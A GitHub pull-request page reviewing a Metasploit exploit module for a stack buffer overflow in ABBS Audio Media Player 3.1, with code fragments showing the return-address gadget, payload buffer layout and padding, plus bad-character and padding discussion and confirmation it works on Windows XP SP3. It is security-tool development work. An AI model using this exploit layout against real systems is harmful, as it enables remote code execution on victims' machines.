New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added abbs amp exploit module #2038
Conversation
[ | ||
[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1', | ||
{ | ||
'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is "\x00" a badchar bat can be used in the ret? I have not done badchars analysis by myself, just asking because sounds strange.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
ah yes, i forgot to remove the \x00 bad char. It doesn't affect the stack after all.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
after a bit research, we still need the \x00 to be in badChars list to make the exploit works. Please see my latest commit 478beee
On the other hand, tried on Windows XP SP3 / ABBS Audio Media Player 3.1 and worked, comments should be discussed / fixed before we're able to land!:
|
buffer = payload.encoded | ||
buffer << rand_text(target['Offset'] - (payload.encoded.length)) | ||
buffer << [target.ret].pack('V') | ||
buffer << rand_text_alpha_upper(800) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Where did the 800
suffix padding length come from? And why is it not dependent on the length of anything else in the buffer?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The 800 chars padding was added to fill the buffer and trigger the overflow. Is there any nice way to fill the buffer?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Well, that would be clearer if you had a constant like OVERFLOW_LENGTH
that then calculated the fill length by doing
overflow_fill = OVERFLOW_LENGTH - buffer.length
buffer << rand_text_alpha_upper(overflow_fill)
That way the overflow will always be correct if the encoded payload were shorter than expected for some reason. It would also let you experiment to see what is the shortest length you can use to trigger the overflow so you can send a smaller exploit.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ah yes, ok I'll experiment with the buffer length and try to include your suggestion. Thanks! 👍
buffer = payload.encoded | ||
buffer << rand_text(target['Offset'] - (payload.encoded.length)) | ||
buffer << [target.ret].pack('V') | ||
buffer << rand_text(target['Max'] - buffer.length) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
And is it really needed? Sorry but doesn't look like a "standard" stack based buffer overflow, so really would like if it's needed at all to reach get EIP control?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Based on my last research, the module doesn't reach EIP if there's no additional buffer. But you're right, I reboot the box and it works now. The last junk is not needed as you said.
Oka, testing again and landing if working! thans @modpr0be ! |
Working:
merging. |
This pull request is for an exploit module for ABBS Audio Media Player exploit posted on exploit-db with EDB-ID 25204.